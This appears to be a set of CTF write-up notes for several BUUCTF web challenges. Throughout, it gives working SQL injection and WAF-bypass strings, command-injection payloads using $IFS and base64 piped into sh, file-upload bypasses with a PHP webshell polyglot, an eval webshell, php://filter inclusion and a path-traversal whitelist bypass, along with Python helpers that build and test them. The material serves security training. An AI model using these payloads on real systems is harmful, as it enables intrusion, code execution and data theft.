                    echo "<hr>";
                }
            }
        }while($mysqli->next_result());
    } else {
        echo "error ".$mysqli->errno." : ".$mysqli->error;
    }
    $mysqli->close();
}
?>
Union injection
error 1054 : Unknown column ‘3’ in ‘order clause’
hint return preg_match(“/select|update|delete|drop|insert|where|./i”,$inject);
Stacked injection (multi_query executes every statement in the string). The two tables:
array(1) { [0]=> string(16) “1919810931114514” }
array(1) { [0]=> string(5) “words” }
-1';desc `1919810931114514`#
array(6) { [0]=> string(4) “flag” [1]=> string(12) “varchar(100)” [2]=> string(2) “NO” [3]=> string(0) “” [4]=> NULL [5]=> string(0) “” }
Bypass with prepared statements: the word select is assembled at runtime by concat()/char(), so waf1's regex never sees it. -1';prepare zero from concat('sel','ect * from `1919810931114514`');execute zero;#
-1';prepare zero from concat(char(115,101,108,101,99,116),' * from `1919810931114514`');execute zero;#
waf2: strstr($inject, "set") && strstr($inject, "prepare"). strstr() is case-sensitive and both substrings must be present, so writing SET and PREPARE in upper case gets past it:
-1';SET @sqli=concat('sel','ect * from `1919810931114514`');PREPARE zero from @sqli;execute zero;#
-1';SET @sqli=concat(char(115,101,108,101,99,116),' * from `1919810931114514`');PREPARE zero from @sqli;execute zero;#
Rename the table and column so the application's own query reads the flag: -1'; alter table words rename to others;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);# After this, select * from `words` where id = '...' runs against the flag table and its column is called id, so a follow-up 1' or 1=1# prints the flag.
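The two WAFs and the rename trick can be replayed locally. The code below is an added example, not the challenge's PHP: `waf1()`/`waf2()` model the two checks (note the case-insensitive preg_match versus case-sensitive strstr), `query()` runs the string-built statement through SQLite's `executescript()` in place of mysqli::multi_query(), and the rename payload is translated to SQLite syntax (`RENAME COLUMN` instead of `CHANGE`, `--` instead of `#`; needs SQLite 3.25+). The schema and flag value are constructed sample data, using the table name the page shows.

```python
import re
import sqlite3

WAF1 = re.compile(r"select|update|delete|drop|insert|where|\.", re.IGNORECASE)


def waf1(inject: str) -> bool:
    """True if blocked: preg_match with the /i flag, so case does not matter."""
    return WAF1.search(inject) is not None


def waf2(inject: str) -> bool:
    """True if blocked: strstr is case-sensitive and BOTH lowercase substrings
    must occur, so 'SET ... PREPARE' passes."""
    return "set" in inject and "prepare" in inject


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the supersqli database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE words(id INTEGER, data TEXT);
        INSERT INTO words VALUES (1, 'hello');
        CREATE TABLE "1919810931114514"(flag TEXT);
        INSERT INTO "1919810931114514" VALUES ('flag{constructed-sample}');
    """)
    return conn


def query(conn: sqlite3.Connection, inject: str):
    """Model of index.php: both WAFs, then the string-built SQL executed as a
    script (stacked statements). executescript() returns no rows, so the
    first statement is re-run afterwards to show what the page would print."""
    if waf1(inject) or waf2(inject):
        raise ValueError("blocked by waf")
    sql = f"select * from `words` where id = '{inject}';"
    conn.executescript(sql)
    first = sql.split(";", 1)[0]
    return conn.execute(first).fetchall()


# The page's rename payload in SQLite syntax (an assumption for this demo).
RENAME = ("-1'; alter table words rename to others;"
          " alter table `1919810931114514` rename to words;"
          " alter table words rename column flag to id; -- ")

if __name__ == "__main__":
    conn = make_db()
    print(query(conn, RENAME))            # [] : stacked statements ran
    print(query(conn, "1' or 1=1 -- "))   # [('flag{constructed-sample}',)]
    print(waf2("-1';set @a=1;prepare p from @a;#"),
          waf2("-1';SET @a=1;PREPARE p from @a;#"))
```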
[GXYCTF2019]Ping Ping Ping: two files in the directory
flag.php
index.php
Spaces and the word flag are filtered, so the file cannot be read directly.
/?ip=1.1.1.1|cat$IFS$1index.php
<?php
if(isset($_GET['ip'])){
    $ip = $_GET['ip'];
    if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
        echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
        die("fxck your symbol!");
    } else if(preg_match("/ /", $ip)){
        die("fxck your space!");
    } else if(preg_match("/bash/", $ip)){
        die("fxck your bash!");
    } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
        die("fxck your flag!");
    }
    $a = shell_exec("ping -c 4 ".$ip);
    echo "<pre>";
    print_r($a);
}
?>
Variable substitution: splice the filtered word together through a shell variable a, so the letters f, l, a, g never appear in order in the request.
/?ip=1.1.1.1|a=g;cat$IFS$9fla$a.php
Inline execution: the output of the command inside backticks is substituted into the command line, so cat `ls` reads every file ls names (the request itself never contains "flag").
/?ip=1.1.1.1|cat$IFS$9`ls`
Encoding bypass: the command is sent base64-encoded, decoded on the box and piped into sh. /?ip=1.1.1.1|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh
Linux has several shells; pick whichever is available (only the string bash is filtered, sh is not).
IFS (Internal Field Separator) is a shell variable; in bash it defaults to space, tab and newline. $IFS expands to those characters and the shell word-splits on them, which is why cat$IFS$9file becomes cat file. The $9 (or $1) is an empty positional parameter: it terminates the variable name so that $IFSfla is not looked up as a single variable.
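The filter and the expansion tricks can be tested without the target. The code below is an added example, not from the page: `passes_filter()` approximates the four preg_match checks, and `run()` hands the surviving payload to /bin/sh the way shell_exec() would, with `true` standing in for ping so nothing touches the network. One caveat the page's `|` payloads skip over: in a POSIX sh each element of a pipeline may run in a subshell, so an assignment like `a=g` placed after `|` does not necessarily survive for the next command; the example chains with `;` instead.

```python
import re
import subprocess

# Approximation of the first preg_match: the symbols it rejects plus control chars.
SYMBOLS = re.compile(r"[&/?*<\x00-\x1f>'\"\\()\[\]{}]")


def passes_filter(ip: str) -> bool:
    """The four checks from index.php, in order."""
    if SYMBOLS.search(ip):
        return False                        # fxck your symbol!
    if " " in ip:
        return False                        # fxck your space!
    if "bash" in ip:
        return False                        # fxck your bash!
    if re.search(r".*f.*l.*a.*g.*", ip):
        return False                        # fxck your flag!
    return True


def run(ip: str) -> str:
    """Model of shell_exec("ping -c 4 ".$ip); 'true' replaces ping so the
    example runs offline. Requires /bin/sh."""
    if not passes_filter(ip):
        raise ValueError("blocked")
    proc = subprocess.run(["/bin/sh", "-c", "true " + ip],
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    for payload in ("1.1.1.1;cat flag.php",            # space + flag
                    "1.1.1.1;cat$IFS$9flag.php",        # flag
                    "1.1.1.1;a=g;cat$IFS$9fla$a.php",   # passes
                    "1.1.1.1;echo$IFS$9hello",
                    "1.1.1.1;a=lo;echo$IFS$9hel$a"):
        print(payload, passes_filter(payload))
    print(run("1.1.1.1;echo$IFS$9hello"), end="")
    print(run("1.1.1.1;a=lo;echo$IFS$9hel$a"), end="")
```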
[ACTF2020 新生赛]Exec 1.1.1.1;cat /flag
[ACTF2020 新生赛]Upload /index.php
<?php
error_reporting(0);
define("UPLOAD_PATH", "./uplo4d");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_name = $_FILES['upload_file']['name'];
    $ext = pathinfo($file_name,PATHINFO_EXTENSION);
    if(in_array($ext, ['php', 'php3', 'php4', 'php5'])) {
        exit('nonono~ Bad file!');
    }
    $new_file_name = md5($file_name).".".$ext;
    $img_path = UPLOAD_PATH . '/' . $new_file_name;
    if (move_uploaded_file($temp_file, $img_path)){
        $is_upload = true;
    } else {
        $msg = 'Upload Failed!';
    }
    echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}
?>
main.js
function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    // allowed upload types
    var allow_ext = ".webp|.webp|.gif";
    // extract the uploaded file's extension
    var ext_name = file.substring(file.lastIndexOf("."));
    // check whether the extension is allowed
    if (allow_ext.indexOf(ext_name) == -1) {
        var errMsg = "该文件不允许上传,请上传jpg、png、gif结尾的图片噢!";
        alert(errMsg);
        return false;
    }
}
Bypass the checks: the JavaScript runs only in the browser, so it can be skipped or the request edited after it runs. Server-side, only php/php3/php4/php5 are blacklisted and the file keeps its extension, so an extension outside the list (e.g. phtml, provided the server's handler maps it to PHP) is stored and the response prints its path.
[极客大挑战 2019]Upload upload_file.php
<?php
$file = $_FILES["file"];
// the original comment calls this "allowed image extensions", but the array is used as a blacklist
$allowedExts = array("php","php2","php3","php4","php5","pht","phtm");
$temp = explode(".", $file["name"]);
$extension = strtolower(end($temp));
$image_type = @exif_imagetype($file["tmp_name"]);
if ((($file["type"] == "image/gif") || ($file["type"] == "image/jpeg") || ($file["type"] == "image/jpg") || ($file["type"] == "image/pjpeg") || ($file["type"] == "image/x-png") || ($file["type"] == "image/png")) && $file["size"] < 20480) {
    if ($file["error"] > 0){
        echo "ERROR!!!";
    } elseif (in_array($extension, $allowedExts)) {
        echo "NOT!".$extension."!";
    } elseif (mb_strpos(file_get_contents($file["tmp_name"]), "<?") !== FALSE) {
        echo "NO! HACKER! your file included '<?'";
    } elseif (!$image_type) {
        echo "Don't lie to me, it's not image at all!!!";
    } else{
        $fileName='./upload/'.$file['name'];
        move_uploaded_file($file['tmp_name'],$fileName);
        echo "上传文件名: " . $file["name"] . "<br>";
    }
} else {
    echo "Not image!";
}
?>
Several checks have to be bypassed at once: an extension blacklist
a file-type check via a PHP function (exif_imagetype on the content)
a size check (< 20480 bytes, by the Content-Type the client declares)
a signature check for <?
If all pass, the file is moved to the upload directory under its original name.
Use the <script language="php">...</script> form of the PHP one-liner, which contains no <? (this tag form only exists in PHP 5; it was removed in PHP 7.0), give it the extension phtml (not in the blacklist), and prepend a GIF89a header so exif_imagetype() reports a GIF.
When uploading, set the Content-Type part header to image/jpeg.
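Building the polyglot and checking it against each server-side rule before sending it saves a round of guessing. The code below is an added example, not the challenge's upload_file.php: `build_polyglot()` produces the GIF89a-prefixed `<script language="php">` file, `looks_like_image()` stands in for exif_imagetype()'s signature check (GIF, JPEG, PNG only), and `server_check()` replays the PHP checks in the same order and returns the message the page would print. The webshell body is a constructed sample.

```python
GIF_MAGIC = b"GIF89a"
BLACKLIST_EXT = {"php", "php2", "php3", "php4", "php5", "pht", "phtm"}
IMAGE_TYPES = {"image/gif", "image/jpeg", "image/jpg", "image/pjpeg",
               "image/x-png", "image/png"}


def build_polyglot(php_code: str) -> bytes:
    """GIF header (so exif_imagetype() sees a GIF) followed by PHP in the
    <script language="php"> form, which never contains '<?'.
    That tag form works on PHP 5 only; it was removed in PHP 7.0."""
    return GIF_MAGIC + b"\n<script language=\"php\">" + php_code.encode() + b"</script>\n"


def looks_like_image(data: bytes) -> bool:
    """Minimal stand-in for exif_imagetype(): GIF, JPEG or PNG signature."""
    return (data.startswith(b"GIF") or data.startswith(b"\xff\xd8\xff")
            or data.startswith(b"\x89PNG\r\n\x1a\n"))


def server_check(filename: str, content_type: str, data: bytes) -> str:
    """upload_file.php's decisions, in order; returns the printed message."""
    if content_type not in IMAGE_TYPES or len(data) >= 20480:
        return "Not image!"
    ext = filename.split(".")[-1].lower()          # explode('.') + end()
    if ext in BLACKLIST_EXT:
        return f"NOT!{ext}!"
    if b"<?" in data:
        return "NO! HACKER! your file included '<?'"
    if not looks_like_image(data):
        return "Don't lie to me, it's not image at all!!!"
    return f"uploaded: {filename}"


if __name__ == "__main__":
    shell = build_polyglot("@eval($_POST['cmd']);")      # constructed sample body
    print(shell)
    print(server_check("shell.phtml", "image/jpeg", shell))
    print(server_check("shell.php", "image/jpeg", shell))
    print(server_check("shell.phtml", "image/jpeg", b"GIF89a<?php phpinfo();"))
```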
[极客大挑战 2019]Knife /index.php
<?php eval($_POST["Syc"]); ?>
A one-line webshell; connect to it with AntSword (蚁剑).
[极客大挑战 2019]Secret File <a id="master" href="./Archive_room.php" xxx</a>
Leads to Archive_room.php
<a id="master" href="./action.php" xxx</a>
action.php answers with a 302 redirect to end.php
Intercept the redirect with Burp
/secr3t.php
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file);
//the flag is in flag.php
?>
</html>
Read the source with php://filter (the filter only blocks ../, tp, input and data, none of which appear in php://filter/read=convert.base64-encode/resource=flag.php)
flag and secr3t
[ACTF2020 新生赛]Include hint Can you find out the flag?
?file=flag.php
PHP stream wrapper php://filter
?file=php://filter/read=convert.base64-encode/resource=flag.php
[SUCTF 2019]EasySQL: the var_dump-style echo shows the output goes through var_dump
Ran a wordlist against it; some keywords are blocked
Stacked injection
query=-1; show columns from Flag #
from is filtered, so this does not work
Reference: BUUCTF web challenge solutions summary (UCASZ) https://ucasers.cn/buuctf-web%E9%A2%98%E8%A7%A3%E6%B3%95%E6%B1%87%E6%80%BB/#title-3
$sql = "select ".$post['query']."||flag from Flag";
1;set sql_mode=PIPES_AS_CONCAT;select 1 (In MySQL, || is logical OR by default, so select 1||flag from Flag evaluates 1 OR flag and prints 1. After set sql_mode=PIPES_AS_CONCAT, || becomes string concatenation and the same query prints 1 followed by the flag.)
[极客大挑战 2019]EasySQL /check.php?username=admin&password=%27+or+1%3D1
/check.php?username=admin&password=%27+or+1%3D1+%23
[极客大挑战 2019]Http
href="Secret.php"
It doesn’t come from ‘https://Sycsecret.buuoj.cn ‘
HTTP header reference
Referer: https://Sycsecret.buuoj.cn
Please use “Syclover” browser
No!!! you can only read this locally!!!
[极客大挑战 2019]Havefun
<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
    echo 'Syc{cat_cat_cat_cat}';
}
-->
?cat=dog
[HCTF 2018]WarmUp
/source.php
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.webp\" />";
}
?>
hint: /hint.php
flag not here, and flag in ffffllllaaaagggg
?file=hint.php?../../../../../ffffllllaaaagggg (checkFile only looks at the part before the first ?, which is whitelisted; include then treats the whole string as a path, and PHP normalises the ../ components lexically, so the hint.php? directory need not exist)
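The whitelist logic is short enough to port and test offline. The code below is an added example, not the challenge's: `check_file()` is a line-for-line port of emmm::checkFile() (the page has a ?-cut pass and a urldecode-then-cut pass), and `include_target()` shows what path include() ends up opening once the `..` components are resolved. The web root is an assumption for illustration. Note that PHP already URL-decodes $_REQUEST once, so reaching the third (urldecode) branch over HTTP needs the ? sent double-encoded as %253f.

```python
import posixpath
from urllib.parse import unquote

WHITELIST = {"source": "source.php", "hint": "hint.php"}


def check_file(page) -> bool:
    """Port of emmm::checkFile(). in_array() is loose in PHP, but every value
    here is a string, so plain membership is equivalent."""
    if not isinstance(page, str) or page == "":
        return False
    if page in WHITELIST.values():
        return True
    # mb_strpos($page . '?', '?') always finds a '?', so this is "cut at first ?"
    if page.split("?", 1)[0] in WHITELIST.values():
        return True
    decoded = unquote(page)
    if decoded.split("?", 1)[0] in WHITELIST.values():
        return True
    return False


def include_target(page: str, webroot: str = "/var/www/html") -> str:
    """The path include() opens: the '?' is an ordinary character in a
    directory name, and each '../' steps up from there. webroot is an
    assumption for the demo."""
    return posixpath.normpath(posixpath.join(webroot, page))


if __name__ == "__main__":
    for p in ("hint.php", "../../../../../ffffllllaaaagggg",
              "hint.php?../../../../../ffffllllaaaagggg",
              "hint.php%3f../../../../../ffffllllaaaagggg"):
        print(p, check_file(p), include_target(p) if check_file(p) else "-")
```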